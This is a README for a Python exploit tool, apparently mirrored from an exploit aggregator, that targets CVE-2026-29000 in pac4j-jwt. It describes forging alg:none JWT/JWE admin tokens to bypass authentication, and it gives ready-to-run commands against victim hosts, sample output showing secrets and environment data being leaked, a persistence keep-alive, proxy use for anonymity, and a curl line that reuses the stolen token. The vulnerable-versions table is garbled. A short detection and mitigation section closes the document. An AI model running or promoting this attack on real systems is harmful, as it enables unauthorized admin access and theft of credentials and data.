Share
## https://sploitus.com/exploit?id=1FA67007-A54A-5500-B010-59ED98D762FB
# π CVE-2026-29000 - pac4j-jwt Authentication Bypass Exploit
[](https://www.python.org/)
[](https://nvd.nist.gov/vuln/detail/CVE-2026-29000)
[](LICENSE)
[](https://github.com/)
> **Professional Edition** - One-Click Admin Forge via JWT alg:none + JWE Encryption
## π Overview
This exploit weaponizes **CVE-2026-29000**, a critical CVSS 10.0 vulnerability in the **pac4j-jwt** library. By extracting the server's public JWKS key and forging an encrypted JWE token with `alg: none`, it achieves complete authentication bypass and grants full administrative privileges in one click.
### π₯ Key Features
- β
**Zero Authentication Required** - Pre-auth exploitation, no valid creds needed
- β
**Automatic JWKS Discovery** - Scans 15+ endpoints, custom path support
- β
**RSA Key Extraction** - Fetches public key, converts JWKβPEM on the fly
- β
**JWT + JWE Forging** - Creates `alg:none` JWT, wraps in server's own public key
- β
**Full Admin Token** - ROLE_ADMIN, admin:true, configurable expiry
- β
**Authentication Bypass** - Tests 8+ protected endpoints automatically
- β
**Intelligent Info Leak** - Enumerates 20+ sensitive API paths
- β
**Session Persistence** - Keep-alive thread maintains access
- β
**Proxy Support** - HTTP/HTTPS proxy for anonymity
- β
**File Export** - Save forged token + leaked data to files
- β
**Retry Mechanism** - Configurable retries for unstable connections
- β
**Colored Output** - Professional stage-based visual feedback
- β
**Verbose Mode** - Debug logging for troubleshooting
- β
**No Hardcoded Delays** - Only retry backoff and keep-alive pings
## π― Vulnerable Versions
| Library | Affected Versions | Patched Versions |
|---------|-------------------|------------------|
| pac4j-jwt | β οΈ **Disclaimer**: This tool is for authorized security testing and red-team engagements only.
## π¦ Installation
```bash
git clone https://github.com/yourusername/CVE-2026-29000-Exploit.git
cd CVE-2026-29000-Exploit
pip install -r requirements.txt
python exploit.py --help
requirements.txt:
text
requests>=2.31.0
urllib3>=2.0.0
pyjwt>=2.8.0
cryptography>=41.0.0
jwcrypto>=1.5.0
colorama>=0.4.6
π Usage
Basic One-Shot Exploit
bash
python exploit.py --target https://victim.com:8443
Save Forged Token + Leak Data
bash
python exploit.py -t https://target.corp:9443 -o admin.jwe -l stolen.txt
Verbose Mode with Custom JWKS
bash
python exploit.py -t https://example.com:8080 --jwks /oauth/jwks.json -v
With Proxy and No Keep-Alive
bash
python exploit.py -t https://192.168.1.100:443 --proxy http://127.0.0.1:8080 --no-keep-alive
Custom Keep-Alive Interval
bash
python exploit.py -t https://victim.com:8443 --delay 10 --max-retries 5
SSL Verification Enabled
bash
python exploit.py -t https://legit.com:8443 --ssl-verify
βοΈ Command Line Arguments
Argument Short Required Default Description
--target -t Yes - Target URL (e.g., https://example.com:8443)
--jwks -k No auto-detect Custom JWKS endpoint path
--output -o No None Save forged JWE token to file
--leak -l No leaked_TIMESTAMP.txt Save leaked data to file
--verbose -v No False Enable debug output
--proxy -p No None HTTP/HTTPS proxy
--user-agent -ua No Mozilla/5.0... Custom User-Agent
--no-keep-alive - No False Disable session keep-alive
--delay - No 5.0 Keep-alive ping interval (seconds)
--max-retries - No 3 Max retries per failed request
--ssl-verify - No False Verify SSL certificates
πΈ Example Output
text
$ python exploit.py -t https://10.10.10.100:8443 -o backdoor.jwe -l leak.txt
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β CVE-2026-29000 - pac4j-jwt Authentication Bypass Exploit β
β The Professional OneβClick Admin Forge β
β CVSS 10.0 - CRITICAL β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
[11:23:15] STAGE 1: Acquiring RSA public key from JWKS
[11:23:15] Probing for JWKS endpoint...
[11:23:16] Found JWKS at /realms/master/protocol/openid-connect/certs
[11:23:16] Successfully extracted RSA public key
[11:23:16] STAGE 2: Crafting JWT with alg:none & encrypting into JWE
[11:23:16] Forged JWE token (truncated): eyJhbGciOiJSU0EtT0FFUC0yNTYiLCJlbmMiOiJBMjU2R0...
[11:23:16] β Token saved to backdoor.jwe
[11:23:16] STAGE 3: Sending forged JWE as Bearer token
[11:23:17] β Authentication successful! Access granted to /api/users/me
[11:23:17] STAGE 4: Enumerating accessible endpoints & revealing sensitive data
[11:23:18] β Leaked: /actuator/env (status 200)
[11:23:18] β Leaked: /api/users (status 200)
[11:23:18] β Leaked: /api/secrets (status 200)
[11:23:18] β Leaked: /config/server (status 200)
[11:23:18] β Captured 4 sensitive endpoints β saved to leak.txt
[11:23:18] Keepβalive session active (Ctrl+C to stop)
[11:23:18] Token (JWE) valid for ~1 hour β reforge if expired
π§ How It Works
text
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β STAGE 1: Public Key Acquisition β
β βββ Discover JWKS endpoint (15+ known paths) β
β βββ Fetch JWK containing RSA public key β
β βββ Convert JWK β PEM format β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β STAGE 2: Token Forging β
β βββ Create JWT with alg: "none" β
β βββ Inject admin claims (ROLE_ADMIN, admin: true) β
β βββ Encrypt JWT into JWE using server's public key β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β STAGE 3: Authentication Bypass β
β βββ Send JWE as Bearer token β
β βββ Test 8+ protected endpoints β
β βββ Extract session cookie β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β STAGE 4: Information Exfiltration β
β βββ Enumerate 20+ sensitive API paths β
β βββ Collect configs, users, secrets, environment β
β βββ Save all to leak file β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β Keep-Alive: Ping /api/ping every N seconds β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
π§ Manual Token Usage
After exploitation, use the saved JWE token with curl:
bash
curl -H "Authorization: Bearer $(cat backdoor.jwe)" https://target.com/api/admin/users
π‘οΈ Detection & Mitigation
Detection Method Indicator
Log Analysis JWT with alg: none in audit logs
Network Monitoring JWKS endpoint requests from unknown IPs
Version Check curl /actuator/info | grep pac4j
Mitigation:
Update pac4j-jwt to patched versions (β₯5.1.5, β₯4.5.8, β₯3.18.6)
Disable alg: none support in JWT validator
Implement strict JWE validation
Monitor for anomalous JWT structures